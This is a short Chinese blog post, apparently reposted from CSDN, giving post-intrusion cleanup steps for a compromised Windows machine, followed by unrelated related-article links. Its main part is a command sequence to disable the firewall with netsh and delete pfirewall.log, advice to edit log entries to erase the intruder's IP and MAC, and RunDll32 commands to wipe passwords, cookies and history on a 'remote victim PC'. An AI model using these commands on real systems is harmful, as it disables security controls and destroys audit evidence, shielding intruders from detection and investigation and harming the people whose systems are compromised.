入侵Windows以后,删除防火墙记录

简介: 版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396294 1、参考文章2、推荐关注领英前提环境:我们已经拿到了目标的shell,现在准备清理防火墙记录的痕迹。
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396294

1、参考文章

2、推荐关注领英

前提环境:我们已经拿到了目标的shell,现在准备清理防火墙记录的痕迹。

cd logfiles/firewall

观察防火墙的当前目录
type pfirewall.log

读取防火墙日志
Netsh firewall set opmode mode= DISABLE

关闭防火墙
Del pfirewall.log

删除日志文件

type pfirewall.log

验证日志文件是否还在

注:这样是真的省事,可是少了大量日志记录,还是会被发现异常,所以删除带有自己访问记录的条目,或者修改日志内容是最好的选择。把自己的访问ip和,mac记录删除或者修改掉。

个人感觉,删除不是好的选择,你断开连接的时候,有的监管软件会记录你的离开,审核日志的时候,你有离开的记录,没有进入的记录,这就很让人怀疑了。

另:在远程受害者PC中删除Internet Explorer的密码/ Cookies /历史/临时Internet文件

参考文章

删除Internet临时文件
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
删除cookies
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 2
删除历史记录
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 1
从数据中删除
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 16
删除密码
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 32
删除所有
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 255
删除加载项存储的所有+文件和设置
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351
相关文章
|
Java Windows
springboot 在windows 系统下删除指定路径下文件
springboot 在windows 系统下删除指定路径下文件
|
9月前
|
关系型数据库 MySQL 网络安全
新建的windows服务器不能ping通?因为没有关闭防火墙
新建的windows服务器不能ping通?因为没有关闭防火墙
|
安全 网络安全 Windows
Windows系统防火墙放行ICMP
Windows系统防火墙放行ICMP
Windows系统防火墙放行ICMP
|
Windows
windows快速删除大量文件文件夹的方法
windows快速删除大量文件文件夹的方法
367 0
|
Linux 虚拟化 Android开发
Windows下使用Docker容器的踩坑记录
Windows下使用Docker容器的踩坑记录
Windows下使用Docker容器的踩坑记录
|
Ubuntu Windows
记录:解决Ubuntu下使用录屏录制mp4文件在windows下打不开的问题
记录:解决Ubuntu下使用录屏录制mp4文件在windows下打不开的问题
1111 0
|
Windows
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(二)
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(二)
299 0
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(二)
|
Windows
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(一)
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(一)
242 0
【Windows 逆向】OD 调试器工具 ( 显示模块窗口 | 显示记录窗口 | 显示内存窗口 | 显示线程 | 显示句柄 | 显示 CPU | 多窗口界面 )(一)
|
安全 Windows
C盘空间一直在减小(每隔几秒减少0.1),windows文件夹下temp文件夹删除后一直在重复创建
C盘空间一直在减小(每隔几秒减少0.1),windows文件夹下temp文件夹删除后一直在重复创建
C盘空间一直在减小(每隔几秒减少0.1),windows文件夹下temp文件夹删除后一直在重复创建